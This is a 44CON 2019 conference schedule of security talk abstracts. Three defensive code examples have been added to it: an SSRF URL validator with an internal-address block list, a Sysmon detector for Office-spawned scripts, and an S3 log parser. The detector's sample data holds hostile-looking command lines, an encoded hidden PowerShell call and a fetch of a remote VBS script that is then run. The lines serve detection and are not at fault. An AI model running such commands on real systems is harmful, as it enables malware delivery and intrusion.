44CON 2019 has ended


Wednesday, September 11
 

18:00

Registration opens
44CON 2019 opens with the Community Evening. Free to attend (registration required)

Wednesday September 11, 2019 18:00 - 18:29
Registration

18:30

44CON 2019 Community Evening Opening
Wednesday September 11, 2019 18:30 - 18:44
* Track 1 *

18:45

Owning The Cloud Through SSRF
With so many apps running in the cloud, hacking these instances becomes easier with a simple vulnerability caused by unsanitized user input. In this talk, we’ll discuss a number of different methods that helped us exfil data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.

Wednesday September 11, 2019 18:45 - 19:15
Village Hall
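The talk above is about reaching cloud instances through SSRF. What follows is an added example written for this page, not code from the talk or its speakers: an outbound-URL validator that a service can apply before fetching a URL supplied by a user. The resolver is injectable so the check runs offline; the hostname-to-address mappings in the accompanying test are constructed, and the names used (validate_outbound_url, is_forbidden_ip) are this example's own.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Address ranges an outbound fetch driven by user input must never reach.
# The cloud instance metadata address 169.254.169.254 sits inside the
# link-local range, so it is covered without a special case.
FORBIDDEN_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]

ALLOWED_SCHEMES = {"http", "https"}


def is_forbidden_ip(ip_text):
    """True if the address falls in a range outbound fetches may not reach."""
    ip = ipaddress.ip_address(ip_text)
    # An IPv4-mapped IPv6 address (::ffff:169.254.169.254) must be judged
    # by the IPv4 address it carries, or the v4 block list is bypassed.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in FORBIDDEN_NETWORKS)


def default_resolve(host):
    """Resolve a hostname to all of its addresses (A and AAAA) via the OS."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_outbound_url(url, resolve=default_resolve):
    """Reject URLs that would let a server-side fetch reach internal targets.

    Returns the list of resolved addresses so the caller can connect to one of
    them directly; resolving a second time at connect time would reopen the
    check to DNS rebinding.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    if not parts.hostname:
        raise ValueError("no host in URL")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    try:
        literal = ipaddress.ip_address(parts.hostname)
    except ValueError:
        literal = None
    if literal is not None:
        addresses = [str(literal)]
    else:
        # Hostnames such as "2852039166" or "0xa9fea9fe" are not IP literals to
        # the ipaddress module but do resolve via getaddrinfo, so the resolver
        # output is what gets checked, never the textual form.
        addresses = resolve(parts.hostname)
    if not addresses:
        raise ValueError("host does not resolve: %r" % parts.hostname)
    for addr in addresses:
        if is_forbidden_ip(addr):
            raise ValueError("host %r resolves to blocked address %s" % (parts.hostname, addr))
    return addresses
```

Two caveats apply in practice. Redirects are a separate fetch: every Location target must go through the same check, or a permitted host can bounce the request to the metadata endpoint. And this is an application-layer control; it complements rather than replaces restricting which processes on the instance may reach the metadata service at all.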

18:45

Daniel Romero & Mario Rivas - Mundane office equipment: The front door to persistence on enterprise networks
The security of common enterprise infrastructure devices such as desktops and laptops has advanced over the years through incremental improvements in operating system and endpoint security. However, security controls for network devices such as enterprise printers are often ignored and thus present a greater potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations.

In order to assess the current state of mainstream enterprise printer product security and to challenge common assumptions made about the security of these devices, which sit on key parts of enterprise networks and process sensitive data, we set out on a vulnerability and exploitation research project of six known vendors. We were able to find remote vulnerabilities in all printers tested through various attack vectors, revealing a large number of 0-day vulnerabilities in the process.

In this talk we walk through the entire research engagement, from initial phases such as threat modelling to understand printer attack surfaces to the development of attack methodologies and fuzzing tools used to target printer-specific protocols and functions. Besides highlighting important vulnerabilities found and their respective CVEs, proof of concept exploits showing how it is possible to gain full control of printers and all of the data they manage will be presented. This will show how to use enterprise printers as a method of persistence on a network, perhaps to exfiltrate sensitive data or support C2 persistence on Red Team engagements.

We also address a number of challenges that researchers can face when performing vulnerability research on devices such as printers and how we used different techniques to overcome these challenges, working with limited to no debugging and triage capabilities. We also present mitigations that printer manufacturers can implement in order to reduce printer attack surfaces and render exploitation more difficult.

Speakers
Daniel Romero

Managing Security Consultant, NCC Group
Daniel is currently a security consultant and researcher at NCC Group. During his career he has worked in interesting security projects, always trying to “break” as much as possible. In the last years Daniel has mostly been focused on embedded devices / IoT and all what surrounds... Read More →
Mario Rivas

Senior Security Consultant, NCC Group
Mario is a penetration tester and security consultant at NCC Group in Madrid. His interests revolve around all areas of computer security, always trying to learn new things, and specially enjoying writing tools during the process to make his life a bit easier.


Wednesday September 11, 2019 18:45 - 19:44
* Track 1 *

18:45

Chrissy Morgan - RFID Hacking Tools Workshop
A 101 & upwards workshop on Radio Frequency Identification, tools, and how to make your own access control system.
If you’re new to Arduino, RFID or basic electronics, this is the workshop for you!

To start off, an intro into RFID theory and how this is practically applied with the use of tools on the market such as the Proxmark RDV 4.

We will be covering some basics of electronics and, with breadboards, teach you how to put your own circuit together; this will come in handy when we use these basics to help you build your own MFRC522 reader setup.
We will explore the Arduino MFRC522 library, working our way through the scripts and learn how they can be adapted and built upon to bring everything together building your very own access control system.

Speakers
Chrissy Morgan

Chrissy heads up the IT Security Operations for a Close Protection (Bodyguard) company by day and is a Security Researcher by night. As an advocate of practical learning, Chrissy also takes part in bug bounty programs and has found bugs in platforms such as Microsoft and Whois.com... Read More →


Wednesday September 11, 2019 18:45 - 20:44
* Workshop *

19:15

Continuous Integration / Continuous Bounties: Attacking development pipelines for actual profit
CI/CD pipelines are the perfect, bug-rich target for new and experienced bug hunters. As complex, user-controlled automated processes with access to authentication secrets, source code, and application servers in multi-system, multi-user environments, they combine all the things that make bugs likely. In the presentation, I will outline a methodology for hunting for bugs in CI/CD pipelines and walk through actual bugs which have resulted in tens of thousands of dollars in bounty payments.

Wednesday September 11, 2019 19:15 - 19:45
Village Hall

19:45

Chris Wade - Making something out of something
This talk relates to software and hardware modification of existing consumer electronics in order to give them features that could be relevant in a security context. It mainly focuses on techniques for identifying the potential for a device to be modified, and techniques for doing so, with a large number of varying demos to back it up.

The first device modification will be the NX301 handheld OBD-II reader. This device in particular was chosen due to its locked chip, encrypted firmware updates and the board’s capabilities, in particular the STM32 MCU, which could be used for connection to various peripherals. The talk will then outline the current features, and the features that could potentially be added to it. The most key of these will be discussing how, due to the STM32 chip used on the board, it would be possible to turn this device into a handheld USB rubber ducky, with an LCD screen menu and interface. This will then discuss how the device was selected for reverse engineering among a large number of potential devices.

The talk will then move onto another device, the WS-6933 satlink detector. This device was found to have a similar Microcontroller to the previous device, however it has some limitations which meant that it could not be used for the same purpose, but could be used for its own. Various modification techniques will be discussed in depth.

These techniques will be performed on a third device, a 2.4GHz RF module used by radio controlled planes. This device was briefly touched upon in my talk last year “Pwning the 44CON Nerf Tank”, but in this instance will be used in order to show how USB access can be provided to all four radio chipsets on the device, providing a powerful interface for interacting with their specific protocols. This will cover more details of debugging in environments where it is not always possible. This will be briefly touched upon as similar work has been covered in other talks, but can demonstrate useful techniques.

A children’s toy will then be demonstrated with custom firmware to perform different functions to what was intended. This will outline the disassembly and analysis of the device, and point out how large amounts of the technology involved in creating a smart children’s toy are the same as in a more serious piece of equipment, and also outline the same vulnerabilities. This section of the talk will largely be for entertainment value, but will show how anything can be converted into a useful device with a sufficient amount of knowledge and effort.

The last demo will be of what can be done when hardware changes are made to devices. We will demonstrate how, by adding a few additional components and a tuned coil to the back of the OBD-II reader, the device can be modified in order to perform the functions of an NFC device, specifically a Mifare Classic NFC tag, with all of the features necessary to emulate and exploit the device. This will show how desirable modifications can be made to the hardware on the device in order to increase its capabilities, and demos with some NFC exploits will accompany this.

Speakers
Chris Wade

Pen Test Partners
Chris is a seasoned security researcher and consultant. His main focuses are in reverse engineering hardware, fingerprinting USB vulnerabilities and playing with Software Defined Radios, with his key strength lying in firmware analysis, which he utilises as part of the hardware testing... Read More →


Wednesday September 11, 2019 19:45 - 20:44
* Track 1 *

19:45

Blade Runner Final Cut
Wednesday September 11, 2019 19:45 - 21:59
Village Hall
 
Thursday, September 12
 

08:00

Morning Yoga Session
Thursday September 12, 2019 08:00 - 08:44
Village Pub

08:00

Registration opens
Thursday September 12, 2019 08:00 - 09:30
Registration

09:15

44CON 2019 Opening
Thursday September 12, 2019 09:15 - 09:29
* Track 1 *

09:30

Katharina Sommer - Outsourcing global cyber norms?
Traditional mechanisms of international rule-making have failed to drive forward globally accepted norms of responsible behaviour in cyberspace. The private-sector led initiatives that have sprung up in their place thus far fail to consider how threats to state powers and control will be contained. The only way to break that current impasse is by way of new ways of working.

The presentation will make the case for a model of multilateral collaboration, de facto outsourcing responsibility for international cyber norms development to a differently incentivised private sector while ensuring states maintain responsibility for norms enforcement.

It will test the assumption that a model of this kind has not yet been successfully applied, assessing three recent cyber norms initiatives – Cybersecurity Tech Accord; Charter of Trust; Paris Call for Trust and Security in Cyberspace – against five factors before drawing practically focused conclusions, looking at the success factors for adoption of the proposed multilateral collaboration model, and setting out how business and government practices would have to change.

Speakers
Katharina Sommer

Head of Public Affairs, NCC Group
Seeking to act as an interpreter between technical and policy communities, Kat leads the Group’s political engagement, government relations and lobbying work, educating policy-makers on cyber security and internal audiences on political developments and priorities, and shaping the... Read More →


Thursday September 12, 2019 09:30 - 10:29
* Track 1 *

09:30

Nicolas Joly - Hunting for bugs, catching dragons
While browser and plugin exploits are frequent, it’s less common to see exploits affecting targets without scripting capabilities. Are these worth attacking? How do we proceed? How do we identify valid entry points and bugs? This talk will cover some research done at Microsoft on Outlook and Exchange and discuss the results. Scary dragons will be spotted in this tour, hopefully you’ll catch some too.

Speakers
Nicolas Joly

Nicolas Joly is a security engineer at the MSRC in Cheltenham. He has more than 10 years of experience at reverse engineering and vulnerability discovery, and is now focused on finding and exploiting bugs at Microsoft. Prior to this, he used to hunt bugs for bounties and won several... Read More →


Thursday September 12, 2019 09:30 - 10:29
* Track 2 *

09:30

Careers Morning
A coffee morning with careers advice and a small panel.

  • 9:30-10:00 - A chance to informally chat over coffee and to informally gather questions for the panel session
  • 10:00 -10:30 - Panel Q&A use the sli.do app to submit questions anonymously (event number 5085)
  • 10:20-11:00 - More coffee, informal chats and close.


Thursday September 12, 2019 09:30 - 11:00
Village Pub

10:30

Break
Thursday September 12, 2019 10:30 - 10:59
Main Hall

10:30

NCSC and Duncan Atkin - Logging Made Easy Workshop
Logging Made Easy (LME) is a tried and tested self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks. LME is designed to be a quick to deploy logging solution giving you access to useful logs when you need them. Led by NCSC, developed in collaboration with NCC Group and with funding from the Cabinet Office, LME provides an organisation with a simple to deploy, simple to maintain and simple to use logging solution. LME allows users with both limited and advanced knowledge to perform performance, incident response and threat hunting activity. LME gathers logs to provide this capability both from the built-in Windows event logging and from Microsoft Sysmon.

This log data can be leveraged to search for, to name but a few, file hashes, file names, and nefarious launches such as Microsoft Word launching Microsoft PowerShell, which then launches IE to download and execute VBS. On the other end of the attack spectrum, LME allows you to see what applications are crashing on your estate and other performance-related logs, allowing you to be one step ahead of some potential problems.

We will run through this tutorial and then provide you with an environment to give it a go yourself (with a bit of magic for the Windows slow bits)

A hands on look into the logging made easy solution from set-up, roll-out, testing and example uses. This workshop will aim to show attendees how to deploy and use LME over a provided test network. Featuring hands on practicals and scenarios to test out functionality in LME and get a grasp on how this data can be leveraged to achieve greater visibility into actions occurring on your hosts across your estate.

Speakers
NCSC Representatives

NCSC Representatives are not permitted to submit bios, and while funny to make one up, it would be cruel for us to do so, so we’re leaving this blank.
Duncan Atkin

NCC Group
Duncan is a fully certified lumberjack, capable of processing massive volumes of logs. When not processing logs, he enjoys growing trees and making cider with the fruits of his labour. (Duncan did not submit a bio)


Thursday September 12, 2019 10:30 - 12:29
* Workshop *
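The launch chain the workshop description mentions (Word launching PowerShell, which launches IE to fetch a script) is the kind of thing Sysmon process-create events let you reconstruct. As an added example, not part of the LME tutorial or its authors' material, the Python below walks Sysmon Event ID 1 records by ParentProcessGuid and flags script hosts and browsers whose ancestry leads back to an Office application. The records are constructed for this example and reduced to the fields the logic uses; in a deployment they would come from the central log store rather than a list, and the function and constant names are this example's own.

```python
import ntpath

# Constructed Sysmon Event ID 1 (process create) records. Real events carry
# many more fields; only the ones the ancestry walk needs are kept here.
SAMPLE_EVENTS = [
    {"ProcessGuid": "{A1}", "ParentProcessGuid": "{00}",
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessGuid": "{B2}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" invoice.docm'},
    {"ProcessGuid": "{C3}", "ParentProcessGuid": "{B2}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ProcessGuid": "{D4}", "ParentProcessGuid": "{C3}",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": "iexplore.exe http://203.0.113.9/a.vbs"},
    {"ProcessGuid": "{E5}", "ParentProcessGuid": "{D4}",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "wscript.exe a.vbs"},
    # A benign PowerShell session started from the desktop, for contrast.
    {"ProcessGuid": "{F6}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}
BROWSERS = {"iexplore.exe"}


def basename(image):
    """Lower-cased file name of an Image path, parsed as a Windows path."""
    return ntpath.basename(image).lower()


def build_index(events):
    """Map ProcessGuid -> event so parents can be found in O(1)."""
    return {e["ProcessGuid"]: e for e in events}


def ancestry(event, index):
    """Yield the parents of a process, nearest first, following ParentProcessGuid.

    Stops when the parent is missing from the data (the chain started before
    logging did) or when a GUID repeats, so malformed data cannot loop forever.
    """
    seen = set()
    guid = event["ParentProcessGuid"]
    while guid in index and guid not in seen:
        seen.add(guid)
        parent = index[guid]
        yield parent
        guid = parent["ParentProcessGuid"]


def find_office_spawned_scripts(events):
    """Return alerts for script hosts or browsers descended from an Office app."""
    index = build_index(events)
    watched = SCRIPT_HOSTS | BROWSERS
    alerts = []
    for event in events:
        name = basename(event["Image"])
        if name not in watched:
            continue
        chain = [name]
        office_root = None
        for parent in ancestry(event, index):
            parent_name = basename(parent["Image"])
            chain.append(parent_name)
            if parent_name in OFFICE_APPS:
                office_root = parent_name
                break
        if office_root is not None:
            alerts.append({
                "ProcessGuid": event["ProcessGuid"],
                "chain": " <- ".join(chain),
                "CommandLine": event["CommandLine"],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_office_spawned_scripts(SAMPLE_EVENTS):
        print(alert["chain"], "|", alert["CommandLine"])
```

Walking the full ancestry rather than checking only the immediate parent is what catches the later links of the chain: iexplore.exe and wscript.exe are two and three hops away from WINWORD.EXE, and a parent-only rule would miss both. The benign session started from explorer.exe is not reported.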

11:00

The CISO's Dilemma
Defending an enterprise is a balancing act. I have worked as an offensive testing vendor to several global organisations over 18 years. This talk explores the challenges that today’s CISOs face - the threat landscape, overall shortage of infosec expertise, the ever evaporating shelf life of infosec products and an increased burden of compliance requirements. I will share my experiences from working with highly effective CISOs and internal infosec teams and what it takes to function on the razor’s edge.

Thursday September 12, 2019 11:00 - 11:59
* Track 1 *

11:00

Marcello Salvati - BYOI (Bring Your Own Interpreter) payloads: Fusing the powah of .NET with a scripting language of your choosing
Offensive PowerShell tradecraft is in “Zombie Mode”: it’s sorta dead, but not entirely. With all of the defenses Microsoft has implemented in the PowerShell runtime over the past few years, Red Teamers / Pentesters & APT groups have started to shy away from using PowerShell based payloads/delivery mechanisms and migrate over to C#. However, C# is a compiled language; operationally this has a few major downsides: we can’t be as “flexible”, setting up a proper development environment has overhead and can be time consuming, you have to compile all the things all the time etc. Bottom line is I’m lazy and creating your malwarez/custom payloads in C# is not as easy & straight forward as it would be in PowerShell or really any scripting language.

This raises the following quandary: can we somehow get our own scripting language interpreter on the target machine while still remaining opsec safe and use it to perform all of our post-exploitation activities?

Turns out by harnessing the sheer craziness of the .NET framework, you can embed entire interpreters inside of .NET languages allowing you to natively execute scripts written in third-party languages (like Python) on windows! Not only does this allow you to dynamically access all of the .NET API from a scripting language of your choosing, but it also allows you to still remain completely in memory and has a number of advantages over traditional C# payloads! Essentially, BYOI payloads allow you to have all the “power” of PowerShell, without going through PowerShell in anyway!

In this talk we will be covering some key .NET framework concepts in order to understand why this is possible, how to actually do the interpreter/engine/runtime embedding, the concept (that I coined) “engine inception”, differences between traditional C# payloads & BYOI payloads, demoing some examples of BYOI payloads and finally SILENTTRINITY: an open-source C2 framework that I’ve written that attempts to weaponize some of the BYOI concepts.

Speakers
Marcello Salvati

BlackHills Information Security
Marcello Salvati (@byt3bl33d3r) is a Security Analyst at BlackHills Information Security by day and by night a tool developer who discovered a novel technique to turn tea, sushi, alcohol and dank memes into somewhat functioning code. His passions include anything Active Directory... Read More →


Thursday September 12, 2019 11:00 - 11:59
* Track 2 *

11:00

Breaking Badge - Tim Wilkes and Phyushin
Thursday September 12, 2019 11:00 - 11:59
Village Hall

12:00

Lunch
Thursday September 12, 2019 12:00 - 13:29
1st Floor Restaurant

13:30

Here be dragons… the AWS S3 logging minefields
Cloud based services have become the norm. Your services are in the cloud, your data is in the cloud, your logs are in the cloud. What are the new challenges and concerns with this approach?
In this talk, SpectX will share its data-driven research into the reliability and trustworthiness of S3 server access logs. How does S3 server access logging work? What does Amazon’s best-effort log delivery look like in practice? When and how should you analyse the logs? What should you ask? Can you trust the results? If not – what’s the workaround?

Thursday September 12, 2019 13:30 - 14:00
Village Hall
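To make the questions above concrete, here is an added example, not from SpectX or the talk: a parser for S3 server access log records, with two checks run over constructed sample records, successful anonymous object reads and per-operation counts. Field order follows the documented S3 access log format; records written with the newer format carry trailing fields (host id, signature version, cipher suite, auth type, host header, TLS version) that the parser keeps under "extra" rather than guessing names for. The sample lines, bucket name, owner id and request ids are made up, and the function names are this example's own.

```python
import re
from collections import Counter

# Field order of an S3 server access log record. Fields beyond these are
# appended by newer log versions and are retained positionally as "extra".
FIELDS = [
    "bucket_owner", "bucket", "time", "remote_ip", "requester", "request_id",
    "operation", "key", "request_uri", "http_status", "error_code",
    "bytes_sent", "object_size", "total_time", "turn_around_time",
    "referer", "user_agent", "version_id",
]

# A token is a [bracketed timestamp], a "quoted string" (which may contain
# spaces), or a run of non-space characters.
TOKEN = re.compile(r'\[[^\]]*\]|"(?:[^"\\]|\\.)*"|\S+')

# Constructed sample records: an anonymous GET that succeeded, an authenticated
# PUT by the bucket owner, and an anonymous GET that was denied.
SAMPLE_LINES = [
    'OWNERID example-bucket [12/Sep/2019:13:30:01 +0000] 198.51.100.7 - 7D4F1C2E9A3B5C60 '
    'REST.GET.OBJECT reports/q3.pdf "GET /reports/q3.pdf HTTP/1.1" 200 - 51234 51234 34 12 '
    '"-" "curl/7.64.0" - hostid0001 SigV4 ECDHE-RSA-AES128-GCM-SHA256 QueryString '
    'example-bucket.s3.amazonaws.com TLSv1.2',
    'OWNERID example-bucket [12/Sep/2019:13:30:05 +0000] 203.0.113.20 OWNERID 1B2C3D4E5F607182 '
    'REST.PUT.OBJECT reports/q4.pdf "PUT /reports/q4.pdf HTTP/1.1" 200 - - 80211 55 20 '
    '"-" "aws-cli/1.16.200 Python/3.7.4" -',
    'OWNERID example-bucket [12/Sep/2019:13:30:09 +0000] 198.51.100.7 - 9F8E7D6C5B4A3928 '
    'REST.GET.OBJECT secrets/backup.tar.gz "GET /secrets/backup.tar.gz HTTP/1.1" 403 '
    'AccessDenied - 2048000 8 - "-" "curl/7.64.0" -',
]


def parse_record(line):
    """Parse one access log line into a dict keyed by FIELDS plus "extra"."""
    tokens = TOKEN.findall(line.strip())
    if len(tokens) < len(FIELDS):
        raise ValueError("short record: %d fields" % len(tokens))
    cleaned = []
    for tok in tokens:
        if (tok[0] == "[" and tok[-1] == "]") or (tok[0] == '"' and tok[-1] == '"'):
            tok = tok[1:-1]
        cleaned.append(tok)
    record = dict(zip(FIELDS, cleaned))
    record["extra"] = cleaned[len(FIELDS):]
    return record


def anonymous_object_reads(records):
    """Object reads served to unauthenticated callers (requester "-") with a 2xx status."""
    return [
        r for r in records
        if r["requester"] == "-"
        and r["operation"].startswith("REST.GET.OBJECT")
        and r["http_status"].startswith("2")
    ]


def operation_counts(records):
    """How many records of each S3 operation are present."""
    return Counter(r["operation"] for r in records)


if __name__ == "__main__":
    parsed = [parse_record(line) for line in SAMPLE_LINES]
    for r in anonymous_object_reads(parsed):
        print("anonymous read:", r["remote_ip"], r["key"], r["request_id"])
    print(operation_counts(parsed))
```

Because delivery of these logs is best-effort, an empty result from a check like anonymous_object_reads is not evidence that no anonymous read happened; a record can be late or never arrive. Treat hits as reliable and absences as unknown, and corroborate with a second source such as CloudTrail data events where a conclusion matters.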

13:30

Guy Barnhart-Magen - Security Research Teams - How to manage, grow and retain them
Security research teams are one of the important partners in any security organization and are usually found through an external company or through an internal group. Such teams are needed to secure your products, your network, and your business resources.

Managing and measuring such intangibles as “Security research” is a difficult problem, mainly revolving around the need to discover and fix issues before they reach the field and cause actual harm. Measuring or defining KPI for such teams is problematic as research has no firm boundaries or guarantees.

Access to such talent is crucial in today’s world and many companies are looking into hiring and growing such internal teams. Hiring security research talent, retaining and helping them to provide high business ROI is very difficult.

Over my career, I helped build and grow security research teams in large corporates and in start-up environments, and I will share some of my experience and advice for managing such teams.

In this talk, I will cover some basic lay of the land, some KPI that can be used to measure success and advice on how to retain and guide such teams.

Speakers
Guy Barnhart-Magen

BSidesTLV chairman and CTF lead, public speaker, and recipient of the Cisco “black belt” security ninja honor – Cisco’s highest cyber security advocate rank. With nearly 20 years of experience in the cyber-security industry, Guy held various positions in both corporates and... Read More →


Thursday September 12, 2019 13:30 - 14:29
* Track 1 *

13:30

Phillip Roskosch & Stephan Huber - Dial V for Vulnerable: Attacking VoIP Phones
More and more everyday objects become “smart” and get connected to the internet. VoIP phones are among the oldest class of smart devices. Despite new phones being constantly released, most of these devices contain cheap hardware components and badly programmed software. Their state of security is often questionable, or worse. We show that most phones suffer from serious security flaws that allow attackers to gain full control of these devices. Such hijacked devices not only allow the attacker to eavesdrop on all communication, but can serve as an entry point for further attacks to the internal networks they are connected to.

VoIP phones can be found on each enterprise desk, in critical infrastructure buildings, at home and other places where phone communication is required. Therefore, security flaws on such a device can have far-reaching consequences, especially when transmitting sensitive or private information. We present critical vulnerabilities and various classes of security flaws that allow an attacker to fully compromise the respective device. We were able to cause a denial of service, to eavesdrop on conversations, and to gain remote code execution on the phone.

In our investigation, we focused on the web-based user interface that most phones provide for configuration and management purposes. We present different test setups for analyzing the software running on those phones, including emulation and live debugging. Furthermore, we reveal strategies and tools for finding these flaws.

To complete the presentation, we compare our manually detected vulnerabilities to results of different automated firmware security analysis systems. As we show, automated scanners are unable to find most of these vulnerabilities and leave systems widely unprotected.

Speakers
Phillip Roskosch

Philipp is a security researcher of the department Secure Software Engineering at Fraunhofer SIT (Germany). His research interests center on static and dynamic security analysis in the area of mobile apps and IoT devices. Besides research, he is a penetration tester in the same field... Read More →
Stephan Huber

Stephan is a security researcher at the Testlab mobile security group at the Fraunhofer Institute for Secure Information Technology (SIT). His main focus is Android application security testing and developing new static and dynamic analysis techniques for app security evaluation... Read More →


Thursday September 12, 2019 13:30 - 14:29
* Track 2 *

13:30

Max Kamper - Introduction to GLIBC heap exploitation
A 2-hour workshop introducing folks to the basics of GLIBC heap exploitation, covering two publicly known but oft-misunderstood GLIBC heap exploit methods. VMs will be provided with the workshop, and the “House of Force” and “fastbin dup” techniques will be covered in depth.

Students will learn two heap exploitation techniques whilst writing exploits against two vulnerable binaries. It is aimed at those with little to no GLIBC heap experience. A lot of people who CTF are keen on learning about heap exploitation since there are always heap-based challenges and each year new techniques are brought to light. What stops them from learning these techniques is the misconception that heap exploits are prohibitively difficult to write; my workshop is there to dispel this myth and provide a starting point for those who wish to start learning new exploit development techniques.

Speakers
Max Kamper

Applied Intelligence Laboratories
An ex-Royal Marines Commando turned cyber-security enthusiast. Max cut his teeth on electronic warfare operations and now works as a researcher for Applied Intelligence Laboratories. Author of the “ROP Emporium”, he spends his time compiling the GNU C library and wondering how... Read More →


Thursday September 12, 2019 13:30 - 15:29
* Workshop *

14:00

From fuzzing to free reign - Finding zero days with Tenable Research
Over the last 18 months Tenable Research have been hitting the headlines with major vulnerabilities they've discovered in household names and critical devices. Some read like a Hollywood script, enabling an attacker to break into an office undetected, others highlighting huge flaws in critical infrastructure. Join Leslie Forbes from Tenable, as he explores the more notable disclosures, how they were found and the impact they have to us all.

Thursday September 12, 2019 14:00 - 14:30
Village Hall

14:30

Kashish Mittal - One Person Army - Playbook on how to be the first Security Engineer at a company
How often have you heard that ‘Early stage startups don’t care much about Security because if there is no product, there is nothing to secure?’ Although there is merit in the argument that startups need to build product so as to sustain and grow, it often puts the person in charge of securing them in a tricky position. For most startups, this person is the first Security Engineer who can be somewhere between the 10th to 300th employee. By the time the first Security Engineer is on-boarded the attack surface has usually become quite large and he or she faces an uphill battle to go about securing the organization. In such cases, the Security Engineer needs to perform as a ‘one-man army’ keeping the attackers at bay. In this talk, I will present a playbook on how to perform as one.

In this presentation, I will talk about the Startup Security methodology which has served me very well in starting, building and growing Security teams at various startups. The focus and goals include:

DevSecOps – You are in-charge of everything
Automation is your friend – Alerts significantly better than watching or monitoring a tool
Secure, Document, Repeat!
Developer empathy – It is new for them
Build vs Buy – Maximizing ROI in terms of money and time
Security Education and Awareness
iPad signing technique – Risk consumption and buy-in
Alignment with upper management before you accept the job – Budget, Headcount, Goals, Timeline etc.

I will also recount war stories from experiences including mine from when I was the first AppSec Engineer at Duo Security (acquired by Cisco), was founding engineer at Elevate Security and started the Security team at MileIQ (acquired by Microsoft) and those of my colleagues who have been in similar shoes.

Speakers
Kashish Mittal

MileIQ
Kashish Mittal is a Security Researcher and Engineer. He currently is the Head of Security at MileIQ, a Microsoft startup. He has worked for companies such as Elevate Security, Duo Security, Bank of America, Deutsche Bank etc. By choice, he is an ethical hacker and an addicted CTF... Read More →


Thursday September 12, 2019 14:30 - 15:29
* Track 1 *

14:30

Neil Kettle - IBM/Trusteer Rapport: Does IBM (I)ntentionally (B)ackdoor (M)achines?
Despite my best efforts in 2011, IBM/Trusteer Rapport is still doing the rounds in the UK banking community. Having concentrated on what was at that time OS-X related issues with only hints at the Windows issues, no one seemed to pick up the mantle to prove the remainder of Trusteer Rapport nothing more than snake oil. In the intervening years Trusteer have been hard at work improving their backdoors after their acquisition by IBM for a cool $1 billion in September 2013, quite the price to pay indeed. In this talk I’ll cover the historical state of, what was, the MacOS implementation since a recent disclosure resulted in IBM/Trusteer fixing the issues by performing a simple ‘rm -rf’ of the Kernel components (CVE-2018-1985) and the current state of play for the Windows components, the result of which is hopefully the ‘rm -rf’ of the Windows components.

Speakers
Neil Kettle

Digit Labs
Neil was testing various writing products when he found a pair of special sunglasses. Wearing them, he saw the world as it really is: people being bombarded by media and government with messages like “Stay Asleep”, “No Imagination”, “Nobody got fired for buying IBM”. Even... Read More →


Thursday September 12, 2019 14:30 - 15:29
* Track 2 *

14:30

Scout Suite – A Multi-Cloud Security Auditing Tool
Scout Suite (https://github.com/nccgroup/ScoutSuite) is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.
The following cloud providers are currently supported:
  • Amazon Web Services
  • Microsoft Azure
  • Google Cloud Platform
  • Oracle Cloud Infrastructure
  • Alibaba Cloud
During the presentation, we will run Scout Suite against a number of cloud environments preconfigured with typical flaws. We will show how Scout Suite can be used to identify and help with remediation of security misconfigurations.

Thursday September 12, 2019 14:30 - 15:30
Village Hall

15:30

Matt Wixey - “I’m unique, just like you: Human side-channels and their implications for security and privacy”
Almost everything about us – our handwriting, DNA, faces, voices, fingerprints, even our eyes – can be used to distinguish us from the seven billion other people on the planet. These physical identifiers can allow law enforcement to trace back real-world crimes to offenders, and enable biometric authentication mechanisms. However, such identifiers are often irrelevant when it comes to attempting to track or disrupt threat actors.

In this talk, I will discuss, explore, and explain identifiers which are unintentional, non-physical, and generated as a result of human behaviours and activities, but which can still be used to uniquely identify and/or track individual users in the digital realm. I call these identifiers “human side-channels”, and will explore how they work; how they can be used for both attack and defence; and how they can be countered.

I’ll examine three human side-channels in particular: forensic linguistics; behavioural signatures; and cultural references. I will start by exploring the theories underpinning these side-channels, which are rooted in personality psychology and the concepts of consistency and distinctiveness as a result of our unique experiences, training, and feedback. I’ll then explore how they work; walk through case studies and examples/demos of using them practically in security contexts; and discuss how they could be practically applied to investigate and track threat actors, in situations ranging from hostile social media profiles to post-compromise exfiltration and privilege escalation.

I’ll also examine the privacy implications of each technique, and how such characteristics – which are much harder to recognise, obfuscate, or spoof – could be used to erode privacy. I’ll go into detail regarding possible countermeasures to disguise your own human side-channels, and I’ll wrap up by outlining some ideas for future research in these areas.

Speakers
Matt Wixey

